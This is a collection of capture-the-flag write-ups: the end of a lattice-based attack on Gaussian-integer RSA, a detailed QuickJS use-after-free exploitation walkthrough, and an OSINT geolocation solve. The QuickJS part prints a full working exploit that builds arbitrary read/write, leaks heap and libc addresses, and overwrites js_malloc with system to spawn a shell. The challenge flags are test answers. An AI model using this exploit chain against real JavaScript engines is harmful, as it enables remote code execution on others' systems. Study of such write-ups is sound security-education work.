def coppersmith(f, R_r, R_i, N,  k):
    # This was the maximum number of columns/entries a row vector has.
    max_cols = 4 * k
    # polynomial row vectors
    polynomial_rows = []
    x = f.parent().gen(0) # apparently helps sage do its thing

    # Add polynomials from our first technique
    for i in range(k):
        poly_rows = get_coefficients(f^i * N^(k-i), R_r, R_i)
        poly_rows = rpad(poly_rows, max_cols)
        polynomial_rows.extend(poly_rows)

    # Add polynomials from our second technique
    for i in range(k):
        poly_rows = get_coefficients(f^k * x^i, R_r, R_i) 
        poly_rows = rpad(poly_rows, max_cols)
        polynomial_rows.extend(poly_rows)
    
    # We perform LLL on our lattice
    M = matrix(polynomial_rows)
    B = M.LLL()

    # v is the first polynomial from our reduced lattice
    v = B[0] 
    
    # This section was lifted from the official solve, but just cleans up our polynomial
    Q = 0
    for (s, i) in enumerate(list(range(0, len(v), 2))):
        z = v[i] / (R_r^s) + v[i+1] / (R_i^s) * I
        Q += z * x^s

    return Q

R.<x> = PolynomialRing(I.parent(), "x") # sage once again doing its thing
f = x + a # our beloved polynomial

# 10 seemed to be the sweet spot
Q = coppersmith(f, 10^70, 10^68, N, k=10)

# r = x_0 = Q.roots()[0][0]
p = a + Q.roots()[0][0]


# Now we cast the values we calculated to GaussianRationals and find q
p = GaussianRational(Fraction(int(p.real())), Fraction(int(p.imag())))
N = GaussianRational(Fraction(int(N.real())), Fraction(int(N.imag())))
ciphertext = GaussianRational(Fraction(int(ciphertext.real())), Fraction(int(ciphertext.imag())))
q = N / p

# calculate the value of d from p and q
p_norm = int(p.real*p.real + p.imag*p.imag)
q_norm = int(q.real*q.real + q.imag*q.imag)
tot = (p_norm - 1) * (q_norm - 1)
e = 65537
d = pow(e, -1, tot)

# decrypt our ciphertext 
m = decrypt(ciphertext, (N, d))

# decode the message
print(long_to_bytes(int(m.real)) + long_to_bytes(int((m.imag))))
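
The totient step in the script leans on the fact that, for a Gaussian prime, the nonzero residues form a group of order "norm minus one". Here is a minimal pure-Python sketch with toy Gaussian primes. It assumes that decryption is plain modular exponentiation over the Gaussian integers, which I have not checked against the CRSA module, and every helper name below is hypothetical.

```python
# Toy Gaussian-integer RSA. Gaussian integers are (re, im) tuples of Python ints.

def gmul(u, v):
    return (u[0] * v[0] - u[1] * v[1], u[0] * v[1] + u[1] * v[0])


def norm(u):
    return u[0] * u[0] + u[1] * u[1]


def round_div(x, n):
    # Nearest integer to x / n for a positive integer n
    return (2 * x + n) // (2 * n)


def gmod(u, n):
    # u - n * round(u / n), using u / n = u * conj(n) / norm(n)
    t = gmul(u, (n[0], -n[1]))
    quotient = (round_div(t[0], norm(n)), round_div(t[1], norm(n)))
    prod = gmul(n, quotient)
    return (u[0] - prod[0], u[1] - prod[1])


def gpow(base, exp, n):
    # Square-and-multiply, reducing modulo n after every step
    result = (1, 0)
    base = gmod(base, n)
    while exp:
        if exp & 1:
            result = gmod(gmul(result, base), n)
        base = gmod(gmul(base, base), n)
        exp >>= 1
    return result


p, q = (2, 3), (1, 4)                    # toy Gaussian primes with norms 13 and 17
N = gmul(p, q)
tot = (norm(p) - 1) * (norm(q) - 1)      # same formula as in the solve script
e = 5
d = pow(e, -1, tot)                      # needs Python 3.8+

m = gmod((3, 2), N)
c = gpow(m, e, N)
assert gpow(c, d, N) == m
```

The real script does the same thing with 1024-bit values, where the norms of `p` and `q` play the role that `p` and `q` themselves play in textbook RSA.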

Flage

SDCTF{lll_15_k1ng_45879340409310} Indeed it is king.

Final Thoughts

This was a really hard challenge. I spent over 30 hours straight running in circles with various techniques like complex LLL and Algebraic LLL. However, I did not solve this challenge by the end of the CTF. In fact, this challenge went unsolved by anyone. After discussing with the author, I realized that one of my earlier ideas of converting the complex integers to a real matrix to do LLL was actually the intended solution. However, I didn’t quite understand how to complete the solve path, which was doing a canonical embedding. An embedding is similar to what we did with using different columns for the real and imaginary part of the powers of $x$ and using the imaginary multiples.

I’m glad I was able to solve it regardless because it’s better late than never. More importantly, I hope that this guide can give you some understanding of the complexities of the Coppersmith method often needed for RSA challenges. In this vein, I have another section with resources I found useful for this challenge.

Finally, shoutout to 18lauey2 for making such a cool challenge.

Resources to help my dumb dumb brain

A bunch of lectures from Tanja Lange on Coppersmith and RSA as part of 2MMMC10 at Eindhoven University of Technology https://www.youtube.com/@tanjalangecryptology783/videos
The blog written by Cousin Wu Ka Lok from blackb6a https://www.klwu.co/maths-in-crypto/lattice-2/#second-idea
The paper the challenge was inspired by: Ideal forms of Coppersmith’s theorem and Guruswami-Sudan list decoding
A wonderful paper that summarizes the various attacks on RSA: Recovering cryptographic keys from partial information, by example

That’s all folks.

[SDCTF 2024] SlowJS++

2024-05-15T00:00:00+00:00

Summary: Exploiting a UAF caused by an incorrect decrement of an object’s reference count in the QuickJS Javascript engine to gain arbitrary read/write and leaks, and then using that to gain RCE.

Intro

SlowJS++ was a Javascript engine exploitation challenge in SDCTF 2024, with only 2 solves during the competition. I could not solve it before the end of the CTF, but I kept working on the exploit and I finally solved it about 10 hours after the end.

We were given the challenge binary, which was a recent version of the QuickJS Javascript engine compiled with debug info, and told that it was being hosted on Ubuntu 23.10 in the remote environment. I downloaded the libc, libm, and ld for Ubuntu 23.10 and patched the binary to use those. The challenge also had a hint that said we should bindiff the async_func_resume function.

QuickJS Internals

This challenge is about async functions and promises in Javascript. I found this, this, and this very helpful in understanding the javascript concepts. Also, this writeup was particularly helpful in understanding a bit more about QuickJS internals.

1. JSValue

QuickJS represents JSValues as two qwords. The first one is the value (in case of int/double/etc.) or the pointer (for heap objects), and the second qword is a tag that shows the type of the first qword. The tags can be found here. The negative tag values are for objects that are managed by the heap and the garbage collector. The zero and positive tags are for objects that are not allocated separately on the heap, and are represented with their direct value (such as int, double, undefined, etc.). You can look at the different structs used by QuickJS both by looking at the source code and by opening the challenge binary in gdb and using ptype /ox with the struct name.
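
To make the two-qword layout concrete, here is a small sketch that decodes 16 raw bytes (for example, copied out of gdb) into a payload and a tag. The tag constants are how I remember them from quickjs.h for this version, so treat them as assumptions. The one value that is grounded in this writeup is the lowest heap tag, -11, which matches the `0xfffffff4 < (uint)tag` comparison in the decompiled code further down.

```python
import struct

# Tag values recalled from quickjs.h (assumptions, not verified here)
JS_TAG_FIRST = -11        # lowest tag that is heap-managed / reference counted
JS_TAG_STRING = -7
JS_TAG_OBJECT = -1
JS_TAG_INT = 0
JS_TAG_UNDEFINED = 3


def decode_jsvalue(raw):
    """Split a 16-byte JSValue into (payload, tag, has_ref_count)."""
    # payload qword, then the tag as a signed 32-bit int, then 4 padding bytes
    payload, tag = struct.unpack("<Qi4x", raw)
    # Same unsigned comparison as the decompiled check
    has_ref_count = (tag & 0xFFFFFFFF) >= (JS_TAG_FIRST & 0xFFFFFFFF)
    return payload, tag, has_ref_count


heap_object = struct.pack("<Qq", 0x55555556A2C0, JS_TAG_OBJECT)  # made-up pointer
small_int = struct.pack("<Qq", 42, JS_TAG_INT)

print(decode_jsvalue(heap_object))
print(decode_jsvalue(small_int))
```

Only values for which `has_ref_count` is true ever reach the free path, which is why the bug needs a heap object such as a typed array or a string.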

2. JSString

The JSString struct represents a string, and it can be inspected with ptype /ox JSString in gdb:

type = struct JSString {
/* 0x0000      |  0x0004 */    JSRefCountHeader header;
/* 0x0004: 0x0 |  0x0004 */    uint32_t len : 31;
/* 0x0007: 0x7 |  0x0001 */    uint8_t is_wide_char : 1;
/* 0x0008: 0x0 |  0x0004 */    uint32_t hash : 30;
/* 0x000b: 0x6 |  0x0001 */    uint8_t atom_type : 2;
/* 0x000c      |  0x0004 */    uint32_t hash_next;
/* 0x0010      |  0x0000 */    union {
/*                0x0000 */        uint8_t str8[0];
/*                0x0000 */        uint16_t str16[0];
                                   /* total size (bytes):    0 */
                               } u;
                               /* total size (bytes):   16 */
                             }

Basically, there’s some metadata, including the length of the string, in the first 16 bytes, and then from offset 16 the array of string bytes will start (str8). So, the content of the string is not stored in a separate buffer and is stored at the end of the JSString object itself.
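
As a quick illustration of that 16-byte header, here is a sketch that unpacks the bitfields from raw bytes. It assumes the usual little-endian GCC bitfield packing (low bits first), which agrees with the offsets in the ptype output above. The sample dwords are the same four values the exploit writes into the freed string later on.

```python
import struct


def parse_jsstring_header(raw):
    """Decode the first 16 bytes of a JSString (layout taken from the ptype output)."""
    ref_count, len_word, hash_word, hash_next = struct.unpack("<iIII", raw[:16])
    return {
        "ref_count": ref_count,
        "len": len_word & 0x7FFFFFFF,        # low 31 bits
        "is_wide_char": len_word >> 31,      # top bit
        "hash": hash_word & 0x3FFFFFFF,      # low 30 bits
        "atom_type": hash_word >> 30,        # top 2 bits
        "hash_next": hash_next,
    }


# The four dwords written through uaf_str_arr in the exploit
header = struct.pack("<4I", 2, 0x10000000, 0x497F93B1, 0x4B)
fields = parse_jsstring_header(header)
print(fields)
```

Seen this way, writing `0x10000000` into the second dword sets a huge `len` while leaving `is_wide_char` at zero, so the string is still read one byte per character.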

3. JSObject

The JSObject struct represents a generic javascript object in memory. You can see that each object has a gc header, and the first dword of the header is the reference count for the garbage collector. Another important thing about objects is their class_id, which shows the type of that object. Different class id values can be seen here. JSObjects also have two fields called shape and prop. shape points to a JSShape struct that describes the shape of an object and the properties that it has (similar to a map in v8), and the prop field is a pointer to an array of JSProperty structs that each hold the data for one of the properties of our object.

Two important objects to learn about are ArrayBuffers and TypedArrays:

An ArrayBuffer object is a JSObject that has a pointer to a JSArrayBuffer struct instance in its obj.u.array_buffer field. The JSArrayBuffer struct has a pointer to its backing storage memory (the actual data buffer) called data and a few other fields like the length.
A TypedArray is a kind of array that allows the user to use an array buffer’s storage for different types. For example, a Uint32Array is a typed array that has an array buffer inside itself and uses that array buffer as an array of 32-bit integers. The important fields in a JSObject of a typed array are obj.u.array.u1.typed_array, obj.u.array.u.ptr, and obj.u.array.count. The typed_array field has a pointer to a JSTypedArray struct, which itself has a field called obj that points back at the JSObject of our typed array, and has another pointer called buffer that points to a JSObject representing the array buffer behind this typed array. The ptr and count fields in a typed array object represent the pointer to the backing storage of the array buffer behind this typed array (where the actual “data” is stored), and the length of the array. So, if ta_obj is the JSObject of our typed array, ta_obj.u.array.u.ptr and ta_obj.u.array.u1.typed_array->buffer->u.array_buffer->data both point to the backing storage memory of the array, but the first one is way more convenient, so the ptr and count fields inside the typed array object itself are the ones that are used when accessing different indexes of the array. You can look at the source code of JS_SetPropertyValue() to see how this is done.

Another important thing to note about array buffers and typed arrays is that the JSArrayBuffer and JSTypedArray structs have next and prev fields inside their struct list_head fields that form a double-linked list. This double linked list will connect an array buffer with all typed arrays that use that array buffer as their storage buffer. The js_array_buffer_finalizer function here has a for-each loop that when an array buffer gets freed, goes through all typed arrays that use this array buffer and sets the count field of those typed arrays to zero. So, the approach in the writeup I mentioned earlier for a TCTF 2021 challenge does not work any more, because if you cause a UAF for an array buffer, you can no longer use typed arrays previously connected to it to read/write memory from its freed backing storage, as the count field of those typed arrays gets set to zero.

Debugging

A debugging approach that was mentioned in the TCTF writeup by r3kapig was to use Math.min(obj) and break on the js_math_min_max function in gdb, and then inspect the pointer at *$r8 or argv->u.ptr after hitting the breakpoint to find the address of obj. I also used this approach for debugging and it was really helpful.

Vulnerability

I downloaded the source for the latest version of QuickJS from https://github.com/bellard/quickjs/tree/d378a9f3a583cb787c390456e27276d0ee377d23 (this is the latest commit at the time of the CTF) and built an original QuickJS binary with debug info to achieve something similar to the challenge binary. Opening both binaries in Ghidra and comparing the async_func_resume function, you can see that the challenge binary will decrease the reference count on the object returned by an async function, and if that reference count reaches zero it will free the object with __JS_FreeValueRT (given that the object has a negative tag value, which means that it is managed by the gc). This is probably the inlined version of the JS_FreeValueRT function here, which does the same thing. So, an object that is returned from an async function gets its refcount decreased by 1 when it shouldn’t have been decreased. So, if we can cause the refcount of an object to become zero and get the object freed while we still keep the reference to that object in our source, we can cause a UAF situation.

lVar3 = *(long *)(param_2 + 0xa0);
uVar4 = *(undefined8 *)(lVar3 + -8);
piVar5 = *(int **)(lVar3 + -0x10);
*(undefined (*) [16])(lVar3 + -0x10) = (undefined  [16])0x0;
*(undefined8 *)(lVar3 + -8) = 3;
// if the object has a negative tag (heap object) and (--refcount <= 0):
if ((0xfffffff4 < (uint)uVar4) && (iVar1 = *piVar5, *piVar5 = iVar1 + -1, iVar1 + -1 < 1)) {
  __JS_FreeValueRT(*(undefined8 *)(param_1 + 0x18),piVar5);	// free the object
}

Using the Math.min(obj) debug approach to inspect the reference count of some objects after they’re created, you can see that their reference count is 1 more than the expected value. For example, an object with only 1 reference to it has a refcount of 2. This is also something mentioned in the TCTF challenge writeup, and I don’t understand the reason for this either. I also think this might be because of some additional internal reference to the object in the engine.
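
Here is a toy model of that bookkeeping. It is not QuickJS code, and it assumes that each buggy async return costs exactly one reference, which I have not confirmed. Under that assumption, an object that starts at the observed refcount of 2 survives one call and is freed by the second, while the script still holds its variable.

```python
class ToyValue:
    """Stand-in for a heap-managed object with a reference count."""

    def __init__(self, ref_count):
        self.ref_count = ref_count
        self.freed = False


def free_value(value):
    # Mirrors the decompiled check: free once --ref_count drops below 1
    value.ref_count -= 1
    if value.ref_count < 1:
        value.freed = True


def buggy_async_return(value):
    # Net effect of the patched async_func_resume in this model: one extra decrement
    free_value(value)
    return value


arr = ToyValue(ref_count=2)    # the observed refcount of a singly referenced object
buggy_async_return(arr)
print(arr.ref_count, arr.freed)
buggy_async_return(arr)
print(arr.ref_count, arr.freed)
```

The real engine does much more (promise resolution, gc passes), so this should be read as an intuition pump and not as an explanation of the exact behaviour.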

Getting arbitrary read/write

I wrote an async function that returned the object arr, where arr is a globally-defined Uint32Array. I normally expected that after calling fn1() once and returning from it, arr is freed and the UAF is triggered. However, for some reason it appears that we need to call it twice to have arr get freed. I don’t clearly understand the reason for this and found this with a bit of trial and error and playing around with the initial PoC code. Also, it appeared that if the first Math.min(arr) call (between the fn1() calls; the one marked with // ???) is not there, arr will not get freed somehow. However, when the exploit is completed, commenting out that Math.min call did not break the exploit. I assume this might have something to do with the garbage collector being invoked at different times in these situations, but I don’t understand this clearly either. The good thing is that although the garbage collector and the general heap layout of the application are not very predictable and cause weird issues like this, they are deterministic, so they won’t change between different runs of the same js code, and we can tweak some stuff to make the issues caused by them go away.

var arr = new Uint32Array(0x140);
...
async function fn1() {
	console.log("fn1");
	return arr;
}
...
fn1().then(() => {
	Math.min(arr) // ???
	fn1().then(() => {
		Math.min(1);	// arr gets freed here, but we still have the reference to it.
	});
});

Now if we break after the second fn1() call, we can see that arr is freed and is in the malloc free lists. By inspecting the free lists (tcache/fastbins) we can see that we need to allocate a few more objects to bring arr’s freed memory to the top of the free lists. We use a for loop to perform some allocations for this. All JSObject structs are allocated using 0x50-sized chunks, so allocating new objects on the heap will use the same free list as arr’s JSObject chunk:

objs = [];
for (let i = 0; i < 6; i++) {
	objs.push({a: 1});
}

The for loop allocates 6 new objects and pushes them into an array to keep their references and prevent them from being freed. However, the number of iterations of the loop (6) is not always the same and changes weirdly because of the side effects of other parts of the code on the heap layout and gc operations. I had to change this value from 6 to 7 and vice versa several times during the exploit development process. You just have to look at the heap tcache/fastbins layout at the breakpoint before this code segment to determine the number of iterations of this loop.

Now we want to allocate another Uint32Array, but this time we want its ptr field (which points to the actual data storage memory for the array) to point to the same chunk of memory that used to hold the JSObject struct for arr. Therefore, since JSObject structs are allocated in 0x50-sized chunks, it is necessary that the data size of our new array causes the allocation of an 0x50-sized chunk. So, we want our array’s data memory to have a size of 0x48, which means 18 4-byte integers. So, we will define uaf_arr as:
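
The size arithmetic can be double-checked with a short sketch of glibc's request-to-chunk rounding on x86-64 (8-byte size field, 16-byte alignment, 0x20 minimum). The JSString request size below assumes that QuickJS allocates the 16-byte header plus the characters plus one terminating byte, which is my reading of the allocator and not something shown in this writeup.

```python
SIZE_SZ = 8              # width of the chunk size field on x86-64
MALLOC_ALIGN_MASK = 15   # chunks are 16-byte aligned
MINSIZE = 0x20           # smallest possible chunk


def chunk_size(request):
    """Chunk size glibc malloc uses for a request of `request` bytes."""
    padded = request + SIZE_SZ + MALLOC_ALIGN_MASK
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


uint32array_data = 18 * 4        # backing storage of new Uint32Array(18)
jsstring_40_chars = 16 + 40 + 1  # header + 40 bytes + terminator (assumed)

print(hex(chunk_size(uint32array_data)))
print(hex(chunk_size(jsstring_40_chars)))
```

Any request between 0x39 and 0x48 bytes lands in the 0x50 bin, so there is a little slack in the array length, but 18 elements uses the chunk fully.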

uaf_arr = new Uint32Array(18);

The allocation of this new typed array causes 3 malloc calls that should return an 0x50-sized chunk. The first one is to host the JSObject of the ArrayBuffer behind this typed array. The second one is to host the backing storage memory of the array (the one that we want to collide with arr’s object struct), and the third one is for the JSObject of the typed array itself. So, we want arr’s freed memory to be the second chunk from the beginning of tcache before we instantiate uaf_arr to ensure that uaf_arr’s data pointer points to it. We need to adjust the number of allocated objects in the previous for loop to meet this requirement. We can do a Math.min(uaf_arr) right after this line to break and see if everything went as we wanted. uaf_arr’s data pointer (ptr field) must point to the same memory that hosted arr’s JSObject struct.
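
A toy model of the tcache bin helps to see why the freed chunk has to sit in second place. The bin is treated as a simple last-in-first-out list with the head at index 0, and the three allocations are served in the order described above. The chunk names are placeholders, not real addresses.

```python
def allocate_typed_array(tcache_bin):
    """Pop three 0x50 chunks in the order described for new Uint32Array(18)."""
    roles = ("ArrayBuffer JSObject", "backing storage", "typed array JSObject")
    return {role: tcache_bin.pop(0) for role in roles}


# Head of the 0x50 tcache bin first; the freed JSObject of arr is second
tcache_bin = ["chunk_A", "freed_arr_JSObject", "chunk_B", "chunk_C"]
layout = allocate_typed_array(tcache_bin)

assert layout["backing storage"] == "freed_arr_JSObject"
print(layout)
```

If the freed chunk were first or third instead, it would become the JSObject of the new ArrayBuffer or of uaf_arr itself, which is why the loop count before this step needs tuning.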

Now, we can write into uaf_arr and edit the object metadata of arr as we wish:

// set fake object metadata for 'arr'
uaf_arr[0] = 10;		// large refcount to prevent it from being freed by the gc later
uaf_arr[1] = 0x001b0d00;	// class_id of Uint32Array and some flags similar to what uaf_arr has
uaf_arr[0x10] = 0x10000000;	// a huge length value (the .u.array.count field of JSObject)

Now we can point arr’s data pointer (.u.array.u.ptr field) to any arbitrary location by editing its value through uaf_arr and then read/write that location by accessing arr[0]. However, we don’t have any kind of leak yet, so we don’t know what address to write there. The memory of uaf_arr is also zeroed out when it’s re-allocated, so we can’t find any pointers there.
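
Since uaf_arr is an array of dwords laid over a struct, it helps to think in byte offsets. The sketch below builds the same fake header as a 0x48-byte blob. The field offsets are simply the exploit's indices multiplied by four (0x18 for shape, 0x38 for the data pointer, 0x40 for count), the position of class_id inside the second dword is my assumption, and the target address is made up.

```python
import struct

SHAPE_OFFSET = 0x18   # uaf_arr[6] and uaf_arr[7]
PTR_OFFSET = 0x38     # uaf_arr[0xe] and uaf_arr[0xf]
COUNT_OFFSET = 0x40   # uaf_arr[0x10]


def split_qword(value):
    """Return the (low, high) dwords of a 64-bit value."""
    return value & 0xFFFFFFFF, value >> 32


def build_fake_header(target_addr):
    """Build 18 dwords that make arr look like a huge Uint32Array at target_addr."""
    words = [0] * 18
    words[0] = 10                     # refcount
    words[1] = 0x001B0D00             # flags and class_id, copied from the exploit
    low, high = split_qword(target_addr)
    words[PTR_OFFSET // 4] = low
    words[PTR_OFFSET // 4 + 1] = high
    words[COUNT_OFFSET // 4] = 0x10000000
    return struct.pack("<18I", *words)


blob = build_fake_header(0x555555560000)   # hypothetical target address
print(blob.hex())
```

Splitting pointers into low and high dwords like this is the same trick the final exploit uses for heap_base_low and heap_base_high.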

Getting leaks

In order to get leaks I did the same thing that we did to arr, but this time to a string. If we can cause a JSString to be freed and then allocate a Uint32Array whose data pointer points to the JSString struct memory, we can manipulate the length of the JSString and set it to some huge value, which gives us an out-of-bounds (OOB) read on the heap through that string.

var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ";	// a JSString that occupies an 0x50-sized chunk
...
async function fn2() {
	console.log("fn2");
	return str;
}
...
fn1().then(() => {
	fn1().then(() => {
		...
		// do stuff related to causing UAF for 'arr'
		...
		fn2().then(() => {
			fn2().then(() => {
				// 'str' gets freed here while we still have a reference to it.

				// allocate more objects to bring str's freed memory near the top of tcachebin
				for (let i = 0; i < 6; i++) {
					objs.push({a: 1});
				}

				// allocate a typed array with its data pointer pointing to str's freed memory (freed JSString struct)
				var uaf_str_arr = new Uint32Array(18);

				// set metadata of the JSString struct
				uaf_str_arr[0] = 2;	// large refcount to avoid it getting freed by gc
				uaf_str_arr[1] = 0x10000000;	// huge length
				uaf_str_arr[2] = 0x497f93b1;	// some metadata I copied from original 'str'
				uaf_str_arr[3] = 0x4b;			// some metadata I copied from original 'str'
				
				...
			});
		});
	});
});

This has the exact same process as exploiting arr. You just have to adjust the size of the initial content of str so that its JSString struct is allocated in an 0x50-sized chunk, so allocating {a: 1} objects will allocate from the same malloc freelist as it.

Now that we can read stuff from the heap, I wrote a helper function to read a dword from the heap:

const read_dword = (offset) => {
	let result = 0;
	for (let i = 3; i >= 0; i--) {
		result = (result << 8) | str.charCodeAt(offset + i);
	}
	return result;
};

Then, I set a breakpoint and used the tel command in gdb to inspect the pointers that come after str’s buffer on the heap. I could find a pointer with a constant offset from libc base and another pointer with a constant offset from heap base. I used these to leak libc and heap base.
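
For reference, this is the same byte-by-byte little-endian read written in Python against a bytes object, which is handy for replaying leaked data offline. The sample bytes are invented. One thing to keep in mind is that JavaScript's `<<` and `|` work on signed 32-bit integers, so a dword with its top bit set shows up negative there. The `to_int32` helper mimics that.

```python
def read_dword(memory, offset):
    """Little-endian 32-bit read, one byte at a time (highest byte first)."""
    result = 0
    for i in range(3, -1, -1):
        result = (result << 8) | memory[offset + i]
    return result


def to_int32(value):
    """The value JavaScript's 32-bit bitwise operators would report."""
    return value - (1 << 32) if value & 0x80000000 else value


heap = bytes.fromhex("60cd5555" "55550000")   # hypothetical leaked qword
low = read_dword(heap, 0)
high = read_dword(heap, 4)

print(hex((high << 32) | low))
print(to_int32(0xF7A01B20))
```

Writing such a negative number back into a Uint32Array wraps it to the unsigned value again, so the exploit does not need to care about the sign.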

Getting RCE

The JSContext *ctx that gets passed as the first argument to many js functions has a field named rt which is a pointer to JSRuntime. JSRuntime also has a field JSMallocFunctions mf, and another one JSMallocState malloc_state. mf has 4 function pointers, the first of which is js_malloc. Its signature shows that the first argument to it is a JSMallocState *. So, if we can overwrite the ctx->rt->mf.js_malloc function pointer with system() and we can write "/bin/sh" at &(ctx->rt->malloc_state), we will be able to call system("/bin/sh") by triggering js_malloc. Just before doing that, I set the shape field of arr’s object metadata to point to the middle of some area near the base of the heap that seemed to contain just zeros. This will prevent segfaults in an inline function find_own_property called by JS_SetPropertyInternal, which is the function used for writing to an index of arr. In the end, allocating any object will trigger js_malloc and give us a shell. This is the final part of the exploit:

// leak the heap base low and high dwords by reading them from the heap
let heap_base_high = read_dword(0x54);
let heap_base_low = read_dword(0x50) - 0xd60;
console.log(heap_base_high.toString(16));
console.log(heap_base_low.toString(16));

// set the 'shape' property of 'arr' to the middle of an area with zeros.
// this will prevent segfaults in find_own_property which is an inlined function called
// by JS_SetPropertyInternal when performing writes to an index of arr
uaf_arr[6] = heap_base_low + 0x200;
uaf_arr[7] = heap_base_high;

// set the data pointer of arr to point to the heap base
uaf_arr[0xe] = heap_base_low;
uaf_arr[0xf] = heap_base_high;

// leak (main_arena+96), which is a libc address, by reading it off the heap
let libc_leak_low = read_dword(0x100);
let libc_leak_high = read_dword(0x104);
console.log(libc_leak_high.toString(16));
console.log(libc_leak_low.toString(16));

// Math.min(uaf_arr);

// set ctx->rt->mf.js_malloc to system()
arr[0xa8] = libc_leak_low - 0x1a9a50;	// libc-dependent offset
arr[0xa9] = libc_leak_high;

// write "/bin/sh\0" at ctx->rt->malloc_state's location, which gets passed to js_malloc as the first argument
arr[0xb0] = 0x6e69622f;
arr[0xb1] = 0x0068732f;

// trigger js_malloc, which will now do system("/bin/sh")
var x = {a: 1};
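
The magic numbers in that last part are easy to re-derive. The sketch below recomputes the two "/bin/sh" dwords and converts the Uint32Array indices into byte offsets from the heap base (arr's data pointer was set to the heap base just before). The helper name is made up for illustration.

```python
import struct

# "/bin/sh\0" as two little-endian dwords, as written to arr[0xb0] and arr[0xb1]
binsh_low, binsh_high = struct.unpack("<II", b"/bin/sh\x00")
print(hex(binsh_low), hex(binsh_high))


def byte_offset(index, element_size=4):
    """Byte offset of a typed array element from the start of its data."""
    return index * element_size


js_malloc_offset = byte_offset(0xA8)       # where the js_malloc pointer is overwritten
malloc_state_offset = byte_offset(0xB0)    # where "/bin/sh" is written
print(hex(js_malloc_offset), hex(malloc_state_offset))
```

Note that the exploit only adjusts the low dword of the libc leak, so it quietly assumes the subtraction does not borrow from the high dword. That held in my runs, but it is not guaranteed for every ASLR layout.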

Something that I’ve just found out at the time of writing this writeup and commenting my exploit is that even writing too many comments in the exploit code can mess up the heap layout and make the exploit not work. This is probably expected because the JS source code seemed to get allocated on the heap as well, so changing the source code size too much might have effects on the heap layout and break the exploit. Basically, it’s very fragile but at least it’s deterministic :)

Full exploit

And the full final exploit code:

var arr = new Uint32Array(0x140);
var str = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ";
var uaf_arr;
var objs;

async function fn1() {
	console.log("fn1");
	return arr;
}

async function fn2() {
	console.log("fn2");
	return str;
}

fn1().then(() => {
	fn1().then(() => {
		objs = [];
		for (let i = 0; i < 6; i++) {
			objs.push({a: 1});
		}

		uaf_arr = new Uint32Array(18);

		uaf_arr[0] = 10;
		uaf_arr[1] = 0x001b0d00;
		uaf_arr[0x10] = 0x10000000;

		fn2().then(() => {
			fn2().then(() => {
				for (let i = 0; i < 6; i++) {
					objs.push({a: 1});
				}

				var uaf_str_arr = new Uint32Array(18);

				uaf_str_arr[0] = 2;
				uaf_str_arr[1] = 0x10000000;
				uaf_str_arr[2] = 0x497f93b1;
				uaf_str_arr[3] = 0x4b;

				const read_dword = (offset) => {
					let result = 0;
					for (let i = 3; i >= 0; i--) {
						result = (result << 8) | str.charCodeAt(offset + i);
					}
					return result;
				};

				let heap_base_high = read_dword(0x54);
				let heap_base_low = read_dword(0x50) - 0xd60;
				console.log(heap_base_high.toString(16));
				console.log(heap_base_low.toString(16));

				uaf_arr[6] = heap_base_low + 0x200;
				uaf_arr[7] = heap_base_high;

				uaf_arr[0xe] = heap_base_low;
				uaf_arr[0xf] = heap_base_high;

				let libc_leak_low = read_dword(0x100);
				let libc_leak_high = read_dword(0x104);
				console.log(libc_leak_high.toString(16));
				console.log(libc_leak_low.toString(16));

				arr[0xa8] = libc_leak_low - 0x1a9a50;
				arr[0xa9] = libc_leak_high;

				arr[0xb0] = 0x6e69622f;
				arr[0xb1] = 0x0068732f;

				var x = {a: 1};
			});
		});
	});
});

The flag: sdctf{i_PrOMlse_7heRe_1S_n0_UniN7end3D_SOlu7i0n_tHl5_tImE}

[UMDCTF 2024] Lost on Caladan

2024-05-01T00:00:00+00:00

Lost on Caladan [500] OSINT

Challenge Description

you seek to find the finest doctor on caladan. it’s rumored he works at this location. find his name for me.

Solution

As a Dune enthusiast who has seen both films half a dozen times, I know that the finest doctor on Caladan is Dr. Yueh. However, the CTF server did not accept the flag UMDCTF{Wellington_Yueh}. Nonetheless, we were provided with a .jpg file of a certain Google Street View location (a full 360-degree panoramic view).

From here, we are given an image of a Google Street View of what is supposedly a medical center.

Let’s try to find cues to identify macro details of the location, i.e. the country and administrative division such as province, state, or city.

With the glaring white-on-red octagon being a stop sign, we can tell that it is based in North America, specifically in an English-speaking territory. Québec, being the uniquely French-speaking province in Canada, has French signage reading ‘arrêt’, so we can rule out the possibility of it being in Québec.

Additionally, we can see the detailed high-visibility direction signs near the entrance/exit of the parking lot. In North America, as medical centers often span multiple buildings, clear and concise directions are necessary. They are also presented in high contrast colors (blue and white or red and white) for high visibility. Additionally, there are arrows to point the way at intersections.

We can conclude that this is located at a fairly large medical center in the region, possibly with more than 300 beds and with attached out-patient, emergency, rehabilitation, and surgical facilities.

Now let’s look for some other identifiers.

The newsstand by the entrance of the building may provide some insight. Only the “amp” is visible on this newspaper or magazine dispenser.

We can initially conclude that “amp” matches the magazine “Arkansas Money & Politics”, which is a local Arkansas publication. This should help us narrow down the search to Arkansas, USA. However, given the scope of the state, we still need to narrow the search further, so we looked at its large medical centers:

Baptist Health Medical Center - Little Rock (834 Beds)
CHI St. Vincent Infirmary (615 Beds)
UAMS Medical Center (535 Beds)

Source .

The satellite view of Baptist Health Medical Center - Little Rock shows a similar parking lot layout and the same high-visibility direction signs.

The parking lot layout and the high-visibility direction signs (white on dark blue) are similar to the ones in image.

Zooming in on Google Street View, we can select an intersection that fits our criteria of being near a large parking lot and a medical tower.

The beige building on the right is rather interesting, as it is across from a parking lot and matches the color of the building in the image.

Aha, we’ve reached our destination, where a minibus is parked at the front and where the latest issues of Arkansas Money & Politics are available.

“Baptist Eye Center” is a surgical ophthalmology center affiliated with Baptist Health Medical Center - Little Rock. Doctors at this center should be the people we are looking for.

Heading over to WebMD, we can see a list of ophthalmologists working at the center.

We took the ‘best’ doctor literally, as we initially tried to submit flags containing the names of the highest-rated doctors, such as UMDCTF{Christian_Cardell_Hester}. It was not until after nearly 15 minutes of brute-forcing through all of the doctors’ names that we noticed the zero-star-rated “Dr. Sean Adonis Atreides.”

UMDCTF{Sean_Adonis_Atreides} unfortunately was not his full name. We scrambled to find the full name of the doctor, and going to the Oklahoman Board of Medical Licensure and Supervision, we found that his full name is “Sean Paul Adonis Atreides”.

Flag

UMDCTF{Sean_Paul_Adonis_Atreides}
